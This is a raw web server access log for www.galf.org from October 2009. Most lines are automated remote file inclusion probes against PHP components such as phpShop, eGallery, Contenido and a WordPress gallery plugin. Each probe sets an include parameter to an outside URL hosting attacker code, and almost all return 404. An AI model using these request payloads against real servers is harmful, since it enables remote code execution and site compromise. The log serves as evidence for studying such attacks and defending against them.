72.30.142.167 - - [26/Oct/2009:01:01:08 -0700] "GET /labia/?M=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
209.97.212.185 - - [26/Oct/2009:01:04:05 -0700] "GET /logs/access_090427.log/send_reminders.php?includedir=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [26/Oct/2009:01:04:05 -0700] "GET /logs/send_reminders.php?includedir=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [26/Oct/2009:01:04:05 -0700] "GET /send_reminders.php?includedir=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [26/Oct/2009:01:04:08 -0700] "GET /send_reminders.php?includedir=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [26/Oct/2009:01:04:08 -0700] "GET /logs/access_090427.log/send_reminders.php?includedir=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [26/Oct/2009:01:04:08 -0700] "GET /logs/send_reminders.php?includedir=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [26/Oct/2009:01:05:17 -0700] "GET /logs/access_090713.log%20%20/send_reminders.php?includedir=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [26/Oct/2009:01:06:03 -0700] "GET /logs/access_090511.log%20%20/send_reminders.php?includedir=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [26/Oct/2009:01:06:14 -0700] "GET /logs/access_090713.log%20%20/send_reminders.php?includedir=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [26/Oct/2009:01:06:14 -0700] "GET /send_reminders.php?includedir=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [26/Oct/2009:01:06:14 -0700] "GET /logs/send_reminders.php?includedir=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [26/Oct/2009:01:07:37 -0700] "GET /logs/access_090511.log%20%20/send_reminders.php?includedir=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [26/Oct/2009:01:08:03 -0700] "GET /send_reminders.php?includedir=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [26/Oct/2009:01:08:03 -0700] "GET /logs/access_090713.log%20%20/send_reminders.php?includedir=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [26/Oct/2009:01:08:03 -0700] "GET /logs/send_reminders.php?includedir=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [26/Oct/2009:01:08:12 -0700] "GET /logs/access_090713.log/send_reminders.php?includedir=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:01:08:37 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:01:08:37 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:01:08:37 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:01:08:37 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
201.218.228.226 - - [26/Oct/2009:01:09:20 -0700] "GET /logs/access_090511.log%20%20/send_reminders.php?includedir=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [26/Oct/2009:01:09:22 -0700] "GET /logs/access_090713.log%20%20/send_reminders.php?includedir=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [26/Oct/2009:01:09:42 -0700] "GET /logs/access_090511.log%20%20/send_reminders.php?includedir=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [26/Oct/2009:01:11:42 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [26/Oct/2009:01:11:42 -0700] "GET /logs/access_090427.log%20%20/modules/My_eGallery/index.php?basepath=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [26/Oct/2009:01:11:42 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [26/Oct/2009:01:11:56 -0700] "GET /logs/access_090413.log%20%20/modules/My_eGallery/index.php?basepath=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [26/Oct/2009:01:14:15 -0700] "GET /logs/access_090713.log/send_reminders.php?includedir=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [26/Oct/2009:01:14:20 -0700] "GET /logs/access_090511.log/send_reminders.php?includedir=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [26/Oct/2009:01:14:36 -0700] "GET /logs/access_090427.log/modules/My_eGallery/index.php?basepath=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [26/Oct/2009:01:14:40 -0700] "GET /logs/access_090413.log/modules/My_eGallery/index.php?basepath=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [26/Oct/2009:01:17:41 -0700] "GET /logs/access_090713.log/send_reminders.php?includedir=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [26/Oct/2009:01:18:25 -0700] "GET /logs/access_090511.log/send_reminders.php?includedir=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:01:18:43 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:01:18:43 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:01:18:43 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:01:18:43 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
209.97.212.185 - - [26/Oct/2009:01:18:55 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [26/Oct/2009:01:18:55 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [26/Oct/2009:01:18:55 -0700] "GET /logs/access_090601.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [26/Oct/2009:01:19:01 -0700] "GET /logs/access_090323.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [26/Oct/2009:01:21:08 -0700] "GET /logs/access_090511.log/send_reminders.php?includedir=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [26/Oct/2009:01:21:13 -0700] "GET /logs/access_090601.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [26/Oct/2009:01:21:14 -0700] "GET /logs/access_090323.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [26/Oct/2009:01:21:41 -0700] "GET /logs/access_090525.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [26/Oct/2009:01:22:30 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [26/Oct/2009:01:22:30 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [26/Oct/2009:01:22:30 -0700] "GET /logs/access_090601.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [26/Oct/2009:01:23:26 -0700] "GET /logs/access_090323.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [26/Oct/2009:01:25:06 -0700] "GET /logs/access_090713.log/send_reminders.php?includedir=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.212.169.122 - - [26/Oct/2009:01:25:12 -0700] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.212.169.122 - - [26/Oct/2009:01:25:12 -0700] "GET /logs/access.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.212.169.122 - - [26/Oct/2009:01:25:12 -0700] "GET /logs///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.212.169.122 - - [26/Oct/2009:01:25:13 -0700] "GET /logs/access.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.212.169.122 - - [26/Oct/2009:01:25:13 -0700] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.212.169.122 - - [26/Oct/2009:01:25:13 -0700] "GET /logs///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.212.169.122 - - [26/Oct/2009:01:25:24 -0700] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.212.169.122 - - [26/Oct/2009:01:25:24 -0700] "GET /logs/access.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.212.169.122 - - [26/Oct/2009:01:25:24 -0700] "GET /logs///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
201.218.228.226 - - [26/Oct/2009:01:25:48 -0700] "GET /logs/access_090511.log/send_reminders.php?includedir=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.242.78.186 - - [26/Oct/2009:01:28:57 -0700] "GET /logs//common/db.php?commonpath=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.242.78.186 - - [26/Oct/2009:01:28:57 -0700] "GET /common/db.php?commonpath=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.242.78.186 - - [26/Oct/2009:01:28:57 -0700] "GET /logs/access_090608.log%20%20//common/db.php?commonpath=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.242.78.186 - - [26/Oct/2009:01:29:19 -0700] "GET /logs/access_090615.log%20%20//common/db.php?commonpath=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:01:29:59 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:01:29:59 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:01:29:59 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:01:29:59 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
201.218.228.226 - - [26/Oct/2009:01:30:18 -0700] "GET /logs/access_090601.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [26/Oct/2009:01:30:50 -0700] "GET /logs/access_090323.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [26/Oct/2009:01:31:08 -0700] "GET /logs/access_090525.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.209.183 - - [26/Oct/2009:01:31:42 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.209.183 - - [26/Oct/2009:01:31:43 -0700] "GET /logs/?M=D HTTP/1.1" 200 4942 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
216.7.173.20 - - [26/Oct/2009:01:32:04 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.tsang.com/gns/baner.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
216.7.173.20 - - [26/Oct/2009:01:32:04 -0700] "GET /?DOCUMENT_ROOT=http://www.tsang.com/gns/baner.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
216.7.173.20 - - [26/Oct/2009:01:32:04 -0700] "GET /logs/access_091012.log%20%20/?DOCUMENT_ROOT=http://www.tsang.com/gns/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.242.78.186 - - [26/Oct/2009:01:40:11 -0700] "GET /logs/access_090608.log//common/db.php?commonpath=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.242.78.186 - - [26/Oct/2009:01:40:19 -0700] "GET /logs/access_090615.log//common/db.php?commonpath=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.207.47 - - [26/Oct/2009:01:43:58 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
119.68.194.119 - - [26/Oct/2009:01:51:28 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [26/Oct/2009:01:51:28 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [26/Oct/2009:01:51:28 -0700] "GET /logs/access_090803.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [26/Oct/2009:01:52:10 -0700] "GET /logs/access_090720.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [26/Oct/2009:01:52:10 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [26/Oct/2009:01:52:10 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [26/Oct/2009:01:52:19 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [26/Oct/2009:01:52:19 -0700] "GET /logs/access_090720.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [26/Oct/2009:01:52:20 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [26/Oct/2009:01:52:30 -0700] "GET /logs/access_090914.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
198.106.204.159 - - [26/Oct/2009:01:52:59 -0700] "GET /logs/access_091012.log/?DOCUMENT_ROOT=http://pottyland.de/pandegaid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.galf.org"
198.106.204.159 - - [26/Oct/2009:01:52:59 -0700] "GET /?DOCUMENT_ROOT=http://pottyland.de/pandegaid.txt?? HTTP/1.0" 200 1032 "-" "libwww-perl/5.50" "www.galf.org"
198.106.204.159 - - [26/Oct/2009:01:52:59 -0700] "GET /logs/?DOCUMENT_ROOT=http://pottyland.de/pandegaid.txt?? HTTP/1.0" 200 4926 "-" "libwww-perl/5.50" "www.galf.org"
119.68.194.119 - - [26/Oct/2009:01:53:05 -0700] "GET /logs/access_090914.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [26/Oct/2009:01:54:06 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [26/Oct/2009:01:54:06 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [26/Oct/2009:01:54:06 -0700] "GET /logs/access_090803.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.165.81 - - [26/Oct/2009:01:56:50 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.165.81 - - [26/Oct/2009:01:56:50 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.165.81 - - [26/Oct/2009:01:56:50 -0700] "GET /logs/access_090615.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.165.81 - - [26/Oct/2009:01:57:28 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.165.81 - - [26/Oct/2009:01:57:28 -0700] "GET /logs/access_090615.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.165.81 - - [26/Oct/2009:01:57:28 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.165.81 - - [26/Oct/2009:01:57:30 -0700] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.165.81 - - [26/Oct/2009:01:58:08 -0700] "GET /logs/access_090601.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.106.185 - - [26/Oct/2009:01:59:30 -0700] "GET /cendoc/?M=A HTTP/1.1" 200 526 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
72.90.208.147 - - [26/Oct/2009:02:04:11 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.90.208.147 - - [26/Oct/2009:02:07:16 -0700] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.80.193.27 - - [26/Oct/2009:02:09:12 -0700] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {3F274D0C-AC3D-86A4-024D-7E33E185D6FE}; .NET CLR 1.1.4322)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:02:10:54 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:02:10:54 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
